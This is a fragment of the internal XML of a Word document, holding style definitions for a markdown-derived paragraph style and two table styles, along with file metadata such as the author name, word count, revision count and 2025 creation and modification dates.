  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ds-markdown-paragraph">
    <w:name w:val="ds-markdown-paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="002E1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table" w:styleId="GridTable5Dark">
    <w:name w:val="Grid Table 5 Dark"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="50"/>
    <w:rsid w:val="0038039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PlainTable4">
    <w:name w:val="Plain Table 4"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="44"/>
    <w:rsid w:val="0038039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7</Pages>
  <Words>1047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M S</dc:creator>
  <cp:lastModifiedBy>ABHISHEK M S</cp:lastModifiedBy>
  <cp:revision>21</cp:revision>
  <cp:lastPrinted>2025-10-03T18:35:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-09-24T17:01:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-11T15:40:00Z</dcterms:modified>
</cp:coreProperties>
</file>